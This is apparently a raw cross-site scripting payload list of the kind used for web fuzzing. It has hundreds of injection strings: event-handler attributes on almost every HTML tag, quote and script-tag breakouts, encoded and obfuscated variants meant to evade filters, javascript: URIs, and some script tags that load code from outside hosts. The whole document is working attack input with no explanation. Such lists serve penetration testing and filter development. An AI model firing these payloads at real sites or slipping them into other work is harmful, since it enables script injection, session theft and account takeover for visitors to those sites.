"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
</script><svg onload=alert(1)>
<x onclick=alert(1)>click this! 
<x oncopy=alert(1)>copy this! 
<x oncut=alert(1)>copy this! 
<x ondrag=alert(1)>drag this! 
<x onmousedown=alert(1)>click this! 
<x onmousemove=alert(1)>hover this! 
<x onmouseout=alert(1)>hover this! 
<x onmouseover=alert(1)>hover this! 
<x onmouseup=alert(1)>click this! 
<script>alert(1)// 
<script>alert(1)<!–
<script src=//brutelogic.com.br/1.js> 
<script src=//3334957647/1>
%3Cx onxxx=alert(1) 
<%78 onxxx=1 
<x %6Fnxxx=1 
<x o%6Exxx=1 
<x on%78xx=1 
<x onxxx%3D1
<X onxxx=1 
<x OnXxx=1 
<X OnXxx=1 
<x onxxx=1 onxxx=1
<x/onxxx=1 
<x%09onxxx=1 
<x%0Aonxxx=1 
<x%0Conxxx=1 
<x%0Donxxx=1 
<x%2Fonxxx=1 
<x 1='1'onxxx=1 
<x 1="1"onxxx=1
<x </onxxx=1 
<x 1=">" onxxx=1 
<http://onxxx%3D1/
<x onxxx=alert(1) 1='
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1=' 
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script> 
<script src=javascript:alert(1)> 
<iframe src=javascript:alert(1)> 
<embed src=javascript:alert(1)> 
<a href=javascript:alert(1)>click 
<object data=javascript:alert(1)> 
<html ontouchstart=alert(1)> 
<html ontouchend=alert(1)> 
<html ontouchmove=alert(1)> 
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
<script src="data:&comma;alert(1)//
"><script src=data:&comma;alert(1)//
<base href=//0>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
<marquee onstart=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
alert`1`
alert&lpar;1&rpar;
alert&#x28;1&#x29
alert&#40;1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
navigator.vibrate(500)
eval(URL.slice(-8))>#alert(1)
eval(location.hash.slice(1)>#alert(1)
<a onclick="alert(1)">test</a>
<a oncontextmenu="alert(1)">test</a>
<a ondblclick="alert(1)">test</a>
<a onmousedown="alert(1)">test</a>
<a onmouseenter="alert(1)">test</a>
<a onmouseleave="alert(1)">test</a>
<a onmousemove="alert(1)">test</a>
<a onmouseout="alert(1)">test</a>
<a onmouseover="alert(1)">test</a>
<a onmouseup="alert(1)">test</a>
<abbr onclick="alert(1)">test</abbr>
<abbr ondblclick="alert(1)">test</abbr>
<abbr onmouseout="alert(1)">test</abbr>
<abbr onmouseup="alert(1)">test</abbr>
<area onclick="alert(1)">test</area>
<area ondblclick="alert(1)">test</area>
<area onmouseout="alert(1)">test</area>
<area onmouseup="alert(1)">test</area>
<aside onclick="alert(1)">test</aside>
<audio onclick="alert(1)">test</audio>
<audio src/onerror=alert(1)>
<b onclick="alert(1)">test</b>
<b oncontextmenu="alert(1)">test</b>
<b ondblclick="alert(1)">test</b>
<b onmousedown="alert(1)">test</b>
<b onmouseenter="alert(1)">test</b>
<b onmouseleave="alert(1)">test</b>
<b onmousemove="alert(1)">test</b>
<b onmouseout="alert(1)">test</b>
<b onmouseover="alert(1)">test</b>
<b onmouseup="alert(1)">test</b>
<base onclick="alert(1)">test</base>
<base ondblclick="alert(1)">test</base>
<base onmouseout="alert(1)">test</base>
<base onmouseup="alert(1)">test</base>
<bdi onclick="alert(1)">test</bdi>
<bdi ondblclick="alert(1)">test</bdi>
<bdi onmousedown="alert(1)">test</bdi>
<bdi onmouseenter="alert(1)">test</bdi>
<bdi onmouseleave="alert(1)">test</bdi>
<bdi onmousemove="alert(1)">test</bdi>
<bdi onmouseout="alert(1)">test</bdi>
<bdi onmouseover="alert(1)">test</bdi>
<bdi onmouseup="alert(1)">test</bdi>
<bdo onclick="alert(1)">test</bdo>
<bdo ondblclick="alert(1)">test</bdo>
<bdo onmousedown="alert(1)">test</bdo>
<bdo onmouseenter="alert(1)">test</bdo>
<bdo onmouseleave="alert(1)">test</bdo>
<bdo onmousemove="alert(1)">test</bdo>
<bdo onmouseout="alert(1)">test</bdo>
<bdo onmouseover="alert(1)">test</bdo>
<bdo onmouseup="alert(1)">test</bdo>
<big onclick="alert(1)">test</big>
<big ondblclick="alert(1)">test</big>
<big onmousedown="alert(1)">test</big>
<big onmouseenter="alert(1)">test</big>
<big onmouseleave="alert(1)">test</big>
<big onmousemove="alert(1)">test</big>
<big onmouseout="alert(1)">test</big>
<big onmouseover="alert(1)">test</big>
<big onmouseup="alert(1)">test</big>
<blink onclick="alert(1)">test</blink>
<body onafterprint=alert(1)>
<body onbeforeprint=alert(1)>
<body onclick="alert(1)">test</body>
<body ondblclick="alert(1)">test</body>
<body onerror=alert(1) onload=/>
<body onhashchange="alert(1)">
<body onload=alert(1)>
<body onmessage=alert(1)>
<body onmouseout="alert(1)">test</body>
<body onmouseup="alert(1)">test</body>
<body onpageshow=alert(1)>
<body onpopstate=alert(1)>
<body onresize="alert(1)">
<body onwheel=alert(1)>
<br onclick="alert(1)">test</br>
<br oncontextmenu="alert(1)">test</br>
<br ondblclick="alert(1)">test</br>
<br onmousedown="alert(1)">test</br>
<br onmouseenter="alert(1)">test</br>
<br onmouseleave="alert(1)">test</br>
<br onmousemove="alert(1)">test</br>
<br onmouseout="alert(1)">test</br>
<br onmouseover="alert(1)">test</br>
<br onmouseup="alert(1)">test</br>
<cite onclick="alert(1)">test</cite>
<cite ondblclick="alert(1)">test</cite>
<cite onmouseout="alert(1)">test</cite>
<cite onmouseup="alert(1)">test</cite>
<code onclick="alert(1)">test</code>
<code ondblclick="alert(1)">test</code>
<code onmouseout="alert(1)">test</code>
<code onmouseup="alert(1)">test</code>
<col onclick="alert(1)">test</col>
<col ondblclick="alert(1)">test</col>
<col onmousedown="alert(1)">test</col>
<col onmouseenter="alert(1)">test</col>
<col onmouseleave="alert(1)">test</col>
<col onmousemove="alert(1)">test</col>
<col onmouseout="alert(1)">test</col>
<col onmouseover="alert(1)">test</col>
<col onmouseup="alert(1)">test</col>
<data onclick="alert(1)">test</data>
<data ondblclick="alert(1)">test</data>
<data onmouseout="alert(1)">test</data>
<data onmouseup="alert(1)">test</data>
<dd onclick="alert(1)">test</dd>
<dd oncontextmenu="alert(1)">test</dd>
<dd ondblclick="alert(1)">test</dd>
<dd onmousedown="alert(1)">test</dd>
<dd onmouseenter="alert(1)">test</dd>
<dd onmouseleave="alert(1)">test</dd>
<dd onmousemove="alert(1)">test</dd>
<dd onmouseout="alert(1)">test</dd>
<dd onmouseover="alert(1)">test</dd>
<dd onmouseup="alert(1)">test</dd>
<del onclick="alert(1)">test</del>
<del ondblclick="alert(1)">test</del>
<del onmousedown="alert(1)">test</del>
<del onmouseenter="alert(1)">test</del>
<del onmouseleave="alert(1)">test</del>
<del onmousemove="alert(1)">test</del>
<del onmouseout="alert(1)">test</del>
<del onmouseover="alert(1)">test</del>
<del onmouseup="alert(1)">test</del>
<dfn onclick="alert(1)">test</dfn>
<dfn ondblclick="alert(1)">test</dfn>
<dfn onmousedown="alert(1)">test</dfn>
<dfn onmouseenter="alert(1)">test</dfn>
<dfn onmouseleave="alert(1)">test</dfn>
<dfn onmousemove="alert(1)">test</dfn>
<dfn onmouseout="alert(1)">test</dfn>
<dfn onmouseover="alert(1)">test</dfn>
<dfn onmouseup="alert(1)">test</dfn>
<dir onclick="alert(1)">test</dir>
<dir ondblclick="alert(1)">test</dir>
<dir onmousedown="alert(1)">test</dir>
<dir onmouseenter="alert(1)">test</dir>
<dir onmouseleave="alert(1)">test</dir>
<dir onmousemove="alert(1)">test</dir>
<dir onmouseout="alert(1)">test</dir>
<dir onmouseover="alert(1)">test</dir>
<dir onmouseup="alert(1)">test</dir>
<div onclick="alert(1)">test</div>
<div ondblclick="alert(1)">test</div>
<div onmousedown="alert(1)">test</div>
<div onmouseenter="alert(1)">test</div>
<div onmouseleave="alert(1)">test</div>
<div onmousemove="alert(1)">test</div>
<div onmouseout="alert(1)">test</div>
<div onmouseover="alert(1)">test</div>
<div onmouseup="alert(1)">test</div>
<dl onclick="alert(1)">test</dl>
<dl oncontextmenu="alert(1)">test</dl>
<dl ondblclick="alert(1)">test</dl>
<dl onmousedown="alert(1)">test</dl>
<dl onmouseenter="alert(1)">test</dl>
<dl onmouseleave="alert(1)">test</dl>
<dl onmousemove="alert(1)">test</dl>
<dl onmouseout="alert(1)">test</dl>
<dl onmouseover="alert(1)">test</dl>
<dl onmouseup="alert(1)">test</dl>
<dt onclick="alert(1)">test</dt>
<dt oncontextmenu="alert(1)">test</dt>
<dt ondblclick="alert(1)">test</dt>
<dt onmousedown="alert(1)">test</dt>
<dt onmouseenter="alert(1)">test</dt>
<dt onmouseleave="alert(1)">test</dt>
<dt onmousemove="alert(1)">test</dt>
<dt onmouseout="alert(1)">test</dt>
<dt onmouseover="alert(1)">test</dt>
<dt onmouseup="alert(1)">test</dt>
<em onclick="alert(1)">test</em>
<em oncontextmenu="alert(1)">test</em>
<em ondblclick="alert(1)">test</em>
<em onmousedown="alert(1)">test</em>
<em onmouseenter="alert(1)">test</em>
<em onmouseleave="alert(1)">test</em>
<em onmousemove="alert(1)">test</em>
<em onmouseout="alert(1)">test</em>
<em onmouseover="alert(1)">test</em>
<em onmouseup="alert(1)">test</em>
<embed onclick="alert(1)">test</embed>
<embed src=/ onload=alert(1)>
<font onclick="alert(1)">test</font>
<font ondblclick="alert(1)">test</font>
<font onmouseout="alert(1)">test</font>
<font onmouseup="alert(1)">test</font>
<form onclick="alert(1)">test</form>
<form ondblclick="alert(1)">test</form>
<form onmouseout="alert(1)">test</form>
<form onmouseup="alert(1)">test</form>
<frame onclick="alert(1)">test</frame>
<frameset onpageshow=alert(1)>
<frameset><frame id=x onfocus=alert(1)>
<frameset><frame onload=alert(1)>
<h1 onclick="alert(1)">test</h1>
<h1 oncontextmenu="alert(1)">test</h1>
<h1 ondblclick="alert(1)">test</h1>
<h1 onmousedown="alert(1)">test</h1>
<h1 onmouseenter="alert(1)">test</h1>
<h1 onmouseleave="alert(1)">test</h1>
<h1 onmousemove="alert(1)">test</h1>
<h1 onmouseout="alert(1)">test</h1>
<h1 onmouseover="alert(1)">test</h1>
<h1 onmouseup="alert(1)">test</h1>
<head onclick="alert(1)">test</head>
<head ondblclick="alert(1)">test</head>
<head onmouseout="alert(1)">test</head>
<head onmouseup="alert(1)">test</head>
<hr onclick="alert(1)">test</hr>
<hr oncontextmenu="alert(1)">test</hr>
<hr ondblclick="alert(1)">test</hr>
<hr onmousedown="alert(1)">test</hr>
<hr onmouseenter="alert(1)">test</hr>
<hr onmouseleave="alert(1)">test</hr>
<hr onmousemove="alert(1)">test</hr>
<hr onmouseout="alert(1)">test</hr>
<hr onmouseover="alert(1)">test</hr>
<hr onmouseup="alert(1)">test</hr>
<html onclick="alert(1)">test</html>
<html ondblclick="alert(1)">test</html>
<html onmouseout="alert(1)">test</html>
<html onmouseup="alert(1)">test</html>
<i onclick="alert(1)">test</i>
<i oncontextmenu="alert(1)">test</i>
<i ondblclick="alert(1)">test</i>
<i onmousedown="alert(1)">test</i>
<i onmouseenter="alert(1)">test</i>
<i onmouseleave="alert(1)">test</i>
<i onmousemove="alert(1)">test</i>
<i onmouseout="alert(1)">test</i>
<i onmouseover="alert(1)">test</i>
<i onmouseup="alert(1)">test</i>
<iframe id=x onfocus=alert(1)>
<iframe id=x onfocusin=alert(1)>
<iframe onload=alert(1)></iframe>
<image onclick="alert(1)">test</image>
<image src/onerror=alert(1)>
<image srcset=1 onerror=alert(1)>
<img onclick="alert(1)">test</img>
<img ondblclick="alert(1)">test</img>
<img onmousedown="alert(1)">test</img>
<img onmouseenter="alert(1)">test</img>
<img onmouseleave="alert(1)">test</img>
<img onmousemove="alert(1)">test</img>
<img onmouseout="alert(1)">test</img>
<img onmouseover="alert(1)">test</img>
<img onmouseup="alert(1)">test</img>
<img src/onerror=alert(1)>
<img srcset=1 onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<input autofocus onfocusin=alert(1)>
<input id=x onfocus=alert(1)>
<input id=x onfocusin=alert(1)>
<input onauxclick=alert(1)>
<input onchange=alert(1) value=xss>
<input onclick="alert(1)">test</input>
<input oninput=alert(1) value=xss>
<ins onclick="alert(1)">test</ins>
<ins ondblclick="alert(1)">test</ins>
<ins onmousedown="alert(1)">test</ins>
<ins onmouseenter="alert(1)">test</ins>
<ins onmouseleave="alert(1)">test</ins>
<ins onmousemove="alert(1)">test</ins>
<ins onmouseout="alert(1)">test</ins>
<ins onmouseover="alert(1)">test</ins>
<ins onmouseup="alert(1)">test</ins>
<kbd onclick="alert(1)">test</kbd>
<kbd ondblclick="alert(1)">test</kbd>
<kbd onmousedown="alert(1)">test</kbd>
<kbd onmouseenter="alert(1)">test</kbd>
<kbd onmouseleave="alert(1)">test</kbd>
<kbd onmousemove="alert(1)">test</kbd>
<kbd onmouseout="alert(1)">test</kbd>
<kbd onmouseover="alert(1)">test</kbd>
<kbd onmouseup="alert(1)">test</kbd>
<keygen autofocus onfocus=alert(1)>
<keygen autofocus onfocusin=alert(1)>
<keygen id=x onfocus=alert(1)>
<keygen id=x onfocusin=alert(1)>
<label onclick="alert(1)">test</label>
<li onclick="alert(1)">test</li>
<li oncontextmenu="alert(1)">test</li>
<li ondblclick="alert(1)">test</li>
<li onmousedown="alert(1)">test</li>
<li onmouseenter="alert(1)">test</li>
<li onmouseleave="alert(1)">test</li>
<li onmousemove="alert(1)">test</li>
<li onmouseout="alert(1)">test</li>
<li onmouseover="alert(1)">test</li>
<li onmouseup="alert(1)">test</li>
<link onclick="alert(1)">test</link>
<link ondblclick="alert(1)">test</link>
<link onmouseout="alert(1)">test</link>
<link onmouseup="alert(1)">test</link>
<main onclick="alert(1)">test</main>
<main ondblclick="alert(1)">test</main>
<main onmouseout="alert(1)">test</main>
<main onmouseup="alert(1)">test</main>
<map onclick="alert(1)">test</map>
<map ondblclick="alert(1)">test</map>
<map onmousedown="alert(1)">test</map>
<map onmouseenter="alert(1)">test</map>
<map onmouseleave="alert(1)">test</map>
<map onmousemove="alert(1)">test</map>
<map onmouseout="alert(1)">test</map>
<map onmouseover="alert(1)">test</map>
<map onmouseup="alert(1)">test</map>
<mark onclick="alert(1)">test</mark>
<mark ondblclick="alert(1)">test</mark>
<mark onmouseout="alert(1)">test</mark>
<mark onmouseup="alert(1)">test</mark>
<marquee onstart=alert(1)>XSS</marquee>
<menu onclick="alert(1)">test</menu>
<menu ondblclick="alert(1)">test</menu>
<menu onmouseout="alert(1)">test</menu>
<menu onmouseup="alert(1)">test</menu>
<meta onclick="alert(1)">test</meta>
<meta ondblclick="alert(1)">test</meta>
<meta onmouseout="alert(1)">test</meta>
<meta onmouseup="alert(1)">test</meta>
<meter onclick="alert(1)">test</meter>
<nav onclick="alert(1)">test</nav>
<nav ondblclick="alert(1)">test</nav>
<nav onmousedown="alert(1)">test</nav>
<nav onmouseenter="alert(1)">test</nav>
<nav onmouseleave="alert(1)">test</nav>
<nav onmousemove="alert(1)">test</nav>
<nav onmouseout="alert(1)">test</nav>
<nav onmouseover="alert(1)">test</nav>
<nav onmouseup="alert(1)">test</nav>
<nobr onclick="alert(1)">test</nobr>
<nobr ondblclick="alert(1)">test</nobr>
<nobr onmouseout="alert(1)">test</nobr>
<nobr onmouseup="alert(1)">test</nobr>
<object data=/ onload=alert(1)>
<ol onclick="alert(1)">test</ol>
<ol oncontextmenu="alert(1)">test</ol>
<ol ondblclick="alert(1)">test</ol>
<ol onmousedown="alert(1)">test</ol>
<ol onmouseenter="alert(1)">test</ol>
<ol onmouseleave="alert(1)">test</ol>
<ol onmousemove="alert(1)">test</ol>
<ol onmouseout="alert(1)">test</ol>
<ol onmouseover="alert(1)">test</ol>
<ol onmouseup="alert(1)">test</ol>
<p onclick="alert(1)">test</p>
<p oncontextmenu="alert(1)">test</p>
<p ondblclick="alert(1)">test</p>
<p onmousedown="alert(1)">test</p>
<p onmouseenter="alert(1)">test</p>
<p onmouseleave="alert(1)">test</p>
<p onmousemove="alert(1)">test</p>
<p onmouseout="alert(1)">test</p>
<p onmouseover="alert(1)">test</p>
<p onmouseup="alert(1)">test</p>
<param onclick="alert(1)">test</param>
<pre onclick="alert(1)">test</pre>
<pre ondblclick="alert(1)">test</pre>
<pre onmousedown="alert(1)">test</pre>
<pre onmouseenter="alert(1)">test</pre>
<pre onmouseleave="alert(1)">test</pre>
<pre onmousemove="alert(1)">test</pre>
<pre onmouseout="alert(1)">test</pre>
<pre onmouseover="alert(1)">test</pre>
<pre onmouseup="alert(1)">test</pre>
<q onclick="alert(1)">test</q>
<q oncontextmenu="alert(1)">test</q>
<q ondblclick="alert(1)">test</q>
<q onmousedown="alert(1)">test</q>
<q onmouseenter="alert(1)">test</q>
<q onmouseleave="alert(1)">test</q>
<q onmousemove="alert(1)">test</q>
<q onmouseout="alert(1)">test</q>
<q onmouseover="alert(1)">test</q>
<q onmouseup="alert(1)">test</q>
<rb onclick="alert(1)">test</rb>
<rb oncontextmenu="alert(1)">test</rb>
<rb ondblclick="alert(1)">test</rb>
<rb onmousedown="alert(1)">test</rb>
<rb onmouseenter="alert(1)">test</rb>
<rb onmouseleave="alert(1)">test</rb>
<rb onmousemove="alert(1)">test</rb>
<rb onmouseout="alert(1)">test</rb>
<rb onmouseover="alert(1)">test</rb>
<rb onmouseup="alert(1)">test</rb>
<rp onclick="alert(1)">test</rp>
<rp oncontextmenu="alert(1)">test</rp>
<rp ondblclick="alert(1)">test</rp>
<rp onmousedown="alert(1)">test</rp>
<rp onmouseenter="alert(1)">test</rp>
<rp onmouseleave="alert(1)">test</rp>
<rp onmousemove="alert(1)">test</rp>
<rp onmouseout="alert(1)">test</rp>
<rp onmouseover="alert(1)">test</rp>
<rp onmouseup="alert(1)">test</rp>
<rt onclick="alert(1)">test</rt>
<rt oncontextmenu="alert(1)">test</rt>
<rt ondblclick="alert(1)">test</rt>
<rt onmousedown="alert(1)">test</rt>
<rt onmouseenter="alert(1)">test</rt>
<rt onmouseleave="alert(1)">test</rt>
<rt onmousemove="alert(1)">test</rt>
<rt onmouseout="alert(1)">test</rt>
<rt onmouseover="alert(1)">test</rt>
<rt onmouseup="alert(1)">test</rt>
<rtc onclick="alert(1)">test</rtc>
<rtc ondblclick="alert(1)">test</rtc>
<rtc onmousedown="alert(1)">test</rtc>
<rtc onmouseenter="alert(1)">test</rtc>
<rtc onmouseleave="alert(1)">test</rtc>
<rtc onmousemove="alert(1)">test</rtc>
<rtc onmouseout="alert(1)">test</rtc>
<rtc onmouseover="alert(1)">test</rtc>
<rtc onmouseup="alert(1)">test</rtc>
<ruby onclick="alert(1)">test</ruby>
<ruby ondblclick="alert(1)">test</ruby>
<ruby onmouseout="alert(1)">test</ruby>
<ruby onmouseup="alert(1)">test</ruby>
<s onclick="alert(1)">test</s>
<s oncontextmenu="alert(1)">test</s>
<s ondblclick="alert(1)">test</s>
<s onmousedown="alert(1)">test</s>
<s onmouseenter="alert(1)">test</s>
<s onmouseleave="alert(1)">test</s>
<s onmousemove="alert(1)">test</s>
<s onmouseout="alert(1)">test</s>
<s onmouseover="alert(1)">test</s>
<s onmouseup="alert(1)">test</s>
<samp onclick="alert(1)">test</samp>
<samp ondblclick="alert(1)">test</samp>
<samp onmouseout="alert(1)">test</samp>
<samp onmouseup="alert(1)">test</samp>
<select autofocus onfocus=alert(1)>
<select autofocus onfocusin=alert(1)>
<slot onclick="alert(1)">test</slot>
<slot ondblclick="alert(1)">test</slot>
<slot onmouseout="alert(1)">test</slot>
<slot onmouseup="alert(1)">test</slot>
<small onclick="alert(1)">test</small>
<span onclick="alert(1)">test</span>
<span ondblclick="alert(1)">test</span>
<span onmouseout="alert(1)">test</span>
<span onmouseup="alert(1)">test</span>
<style onclick="alert(1)">test</style>
<style onload=alert(1)></style>
<sub onclick="alert(1)">test</sub>
<sub ondblclick="alert(1)">test</sub>
<sub onmousedown="alert(1)">test</sub>
<sub onmouseenter="alert(1)">test</sub>
<sub onmouseleave="alert(1)">test</sub>
<sub onmousemove="alert(1)">test</sub>
<sub onmouseout="alert(1)">test</sub>
<sub onmouseover="alert(1)">test</sub>
<sub onmouseup="alert(1)">test</sub>
<sup onclick="alert(1)">test</sup>
<sup ondblclick="alert(1)">test</sup>
<sup onmousedown="alert(1)">test</sup>
<sup onmouseenter="alert(1)">test</sup>
<sup onmouseleave="alert(1)">test</sup>
<sup onmousemove="alert(1)">test</sup>
<sup onmouseout="alert(1)">test</sup>
<sup onmouseover="alert(1)">test</sup>
<sup onmouseup="alert(1)">test</sup>
<svg id=x onfocus=alert(1)>
<svg id=x onfocusin=alert(1)>
<svg onclick="alert(1)">test</svg>
<svg ondblclick="alert(1)">test</svg>
<svg onload=alert(1)>
<svg onmousedown="alert(1)">test</svg>
<svg onmouseenter="alert(1)">test</svg>
<svg onmouseleave="alert(1)">test</svg>
<svg onmousemove="alert(1)">test</svg>
<svg onmouseout="alert(1)">test</svg>
<svg onmouseover="alert(1)">test</svg>
<svg onmouseup="alert(1)">test</svg>
<svg><a onload=alert(1)></a>
<svg><abbr onload=alert(1)></abbr>
<svg><applet onload=alert(1)></applet>
<svg><area onload=alert(1)></area>
<svg><aside onload=alert(1)></aside>
<svg><audio onload=alert(1)></audio>
<svg><b onload=alert(1)></b>
<svg><base onload=alert(1)></base>
<svg><bdi onload=alert(1)></bdi>
<svg><bdo onload=alert(1)></bdo>
<svg><big onload=alert(1)></big>
<svg><blink onload=alert(1)></blink>
<svg><br onload=alert(1)></br>
<svg><button onload=alert(1)></button>
<svg><canvas onload=alert(1)></canvas>
<svg><center onload=alert(1)></center>
<svg><cite onload=alert(1)></cite>
<svg><code onload=alert(1)></code>
<svg><col onload=alert(1)></col>
<svg><data onload=alert(1)></data>
<svg><dd onload=alert(1)></dd>
<svg><del onload=alert(1)></del>
<svg><dfn onload=alert(1)></dfn>
<svg><dialog onload=alert(1)></dialog>
<svg><dir onload=alert(1)></dir>
<svg><discard onbegin=alert(1)>
<svg><div onload=alert(1)></div>
<svg><dl onload=alert(1)></dl>
<svg><dt onload=alert(1)></dt>
<svg><em onload=alert(1)></em>
<svg><figure onload=alert(1)></figure>
<svg><font onload=alert(1)></font>
<svg><footer onload=alert(1)></footer>
<svg><form onload=alert(1)></form>
<svg><h1 onload=alert(1)></h1>
<svg><head onload=alert(1)></head>
<svg><header onload=alert(1)></header>
<svg><hgroup onload=alert(1)></hgroup>
<svg><hr onload=alert(1)></hr>
<svg><html onload=alert(1)></html>
<svg><i onload=alert(1)></i>
<svg><image href=1 onerror=alert(1)>
<svg><ins onload=alert(1)></ins>
<svg><kbd onload=alert(1)></kbd>
<svg><keygen onload=alert(1)></keygen>
<svg><label onload=alert(1)></label>
<svg><legend onload=alert(1)></legend>
<svg><li onload=alert(1)></li>
<svg><main onload=alert(1)></main>
<svg><map onload=alert(1)></map>
<svg><mark onload=alert(1)></mark>
<svg><menu onload=alert(1)></menu>
<svg><meta onload=alert(1)></meta>
<svg><meter onload=alert(1)></meter>
<svg><nav onload=alert(1)></nav>
<svg><nextid onload=alert(1)></nextid>
<svg><nobr onload=alert(1)></nobr>
<svg><ol onload=alert(1)></ol>
<svg><option onload=alert(1)></option>
<svg><output onload=alert(1)></output>
<svg><p onload=alert(1)></p>
<svg><param onload=alert(1)></param>
<svg><pre onload=alert(1)></pre>
<svg><q onload=alert(1)></q>
<svg><rb onload=alert(1)></rb>
<svg><rp onload=alert(1)></rp>
<svg><rt onload=alert(1)></rt>
<svg><rtc onload=alert(1)></rtc>
<svg><ruby onload=alert(1)></ruby>
<svg><s onload=alert(1)></s>
<svg><samp onload=alert(1)></samp>
<svg><select onload=alert(1)></select>
<svg><shadow onload=alert(1)></shadow>
<svg><slot onload=alert(1)></slot>
<svg><small onload=alert(1)></small>
<svg><source onload=alert(1)></source>
<svg><spacer onload=alert(1)></spacer>
<svg><span onload=alert(1)></span>
<svg><strike onload=alert(1)></strike>
<svg><strong onload=alert(1)></strong>
<svg><sub onload=alert(1)></sub>
<svg><sup onload=alert(1)></sup>
<svg><table onload=alert(1)></table>
<svg><tbody onload=alert(1)></tbody>
<svg><td onload=alert(1)></td>
<svg><tfoot onload=alert(1)></tfoot>
<svg><th onload=alert(1)></th>
<svg><thead onload=alert(1)></thead>
<svg><time onload=alert(1)></time>
<svg><title onload=alert(1)></title>
<svg><tr onload=alert(1)></tr>
<svg><tt onload=alert(1)></tt>
<svg><u onload=alert(1)></u>
<svg><ul onload=alert(1)></ul>
<svg><var onload=alert(1)></var>
<svg><video onload=alert(1)></video>
<svg><wbr onload=alert(1)></wbr>
<svg><xmp onload=alert(1)></xmp>
<svg><xss onload=alert(1)></xss>
<table onclick="alert(1)">test</table>
<tbody onclick="alert(1)">test</tbody>
<td onclick="alert(1)">test</td>
<td oncontextmenu="alert(1)">test</td>
<td ondblclick="alert(1)">test</td>
<td onmousedown="alert(1)">test</td>
<td onmouseenter="alert(1)">test</td>
<td onmouseleave="alert(1)">test</td>
<td onmousemove="alert(1)">test</td>
<td onmouseout="alert(1)">test</td>
<td onmouseover="alert(1)">test</td>
<td onmouseup="alert(1)">test</td>
<tfoot onclick="alert(1)">test</tfoot>
<th onclick="alert(1)">test</th>
<th oncontextmenu="alert(1)">test</th>
<th ondblclick="alert(1)">test</th>
<th onmousedown="alert(1)">test</th>
<th onmouseenter="alert(1)">test</th>
<th onmouseleave="alert(1)">test</th>
<th onmousemove="alert(1)">test</th>
<th onmouseout="alert(1)">test</th>
<th onmouseover="alert(1)">test</th>
<th onmouseup="alert(1)">test</th>
<thead onclick="alert(1)">test</thead>
<time onclick="alert(1)">test</time>
<time ondblclick="alert(1)">test</time>
<time onmouseout="alert(1)">test</time>
<time onmouseup="alert(1)">test</time>
<title onclick="alert(1)">test</title>
<tr onclick="alert(1)">test</tr>
<tr oncontextmenu="alert(1)">test</tr>
<tr ondblclick="alert(1)">test</tr>
<tr onmousedown="alert(1)">test</tr>
<tr onmouseenter="alert(1)">test</tr>
<tr onmouseleave="alert(1)">test</tr>
<tr onmousemove="alert(1)">test</tr>
<tr onmouseout="alert(1)">test</tr>
<tr onmouseover="alert(1)">test</tr>
<tr onmouseup="alert(1)">test</tr>
<track onclick="alert(1)">test</track>
<tt onclick="alert(1)">test</tt>
<tt oncontextmenu="alert(1)">test</tt>
<tt ondblclick="alert(1)">test</tt>
<tt onmousedown="alert(1)">test</tt>
<tt onmouseenter="alert(1)">test</tt>
<tt onmouseleave="alert(1)">test</tt>
<tt onmousemove="alert(1)">test</tt>
<tt onmouseout="alert(1)">test</tt>
<tt onmouseover="alert(1)">test</tt>
<tt onmouseup="alert(1)">test</tt>
<u onclick="alert(1)">test</u>
<u oncontextmenu="alert(1)">test</u>
<u ondblclick="alert(1)">test</u>
<u onmousedown="alert(1)">test</u>
<u onmouseenter="alert(1)">test</u>
<u onmouseleave="alert(1)">test</u>
<u onmousemove="alert(1)">test</u>
<u onmouseout="alert(1)">test</u>
<u onmouseover="alert(1)">test</u>
<u onmouseup="alert(1)">test</u>
<ul onclick="alert(1)">test</ul>
<ul oncontextmenu="alert(1)">test</ul>
<ul ondblclick="alert(1)">test</ul>
<ul onmousedown="alert(1)">test</ul>
<ul onmouseenter="alert(1)">test</ul>
<ul onmouseleave="alert(1)">test</ul>
<ul onmousemove="alert(1)">test</ul>
<ul onmouseout="alert(1)">test</ul>
<ul onmouseover="alert(1)">test</ul>
<ul onmouseup="alert(1)">test</ul>
<var onclick="alert(1)">test</var>
<var ondblclick="alert(1)">test</var>
<var onmousedown="alert(1)">test</var>
<var onmouseenter="alert(1)">test</var>
<var onmouseleave="alert(1)">test</var>
<var onmousemove="alert(1)">test</var>
<var onmouseout="alert(1)">test</var>
<var onmouseover="alert(1)">test</var>
<var onmouseup="alert(1)">test</var>
<video onclick="alert(1)">test</video>
<video src/onerror=alert(1)>
<wbr onclick="alert(1)">test</wbr>
<wbr ondblclick="alert(1)">test</wbr>
<wbr onmousedown="alert(1)">test</wbr>
<wbr onmouseenter="alert(1)">test</wbr>
<wbr onmouseleave="alert(1)">test</wbr>
<wbr onmousemove="alert(1)">test</wbr>
<wbr onmouseout="alert(1)">test</wbr>
<wbr onmouseover="alert(1)">test</wbr>
<wbr onmouseup="alert(1)">test</wbr>
<xmp onclick="alert(1)">test</xmp>
<xmp ondblclick="alert(1)">test</xmp>
<xmp onmousedown="alert(1)">test</xmp>
<xmp onmouseenter="alert(1)">test</xmp>
<xmp onmouseleave="alert(1)">test</xmp>
<xmp onmousemove="alert(1)">test</xmp>
<xmp onmouseout="alert(1)">test</xmp>
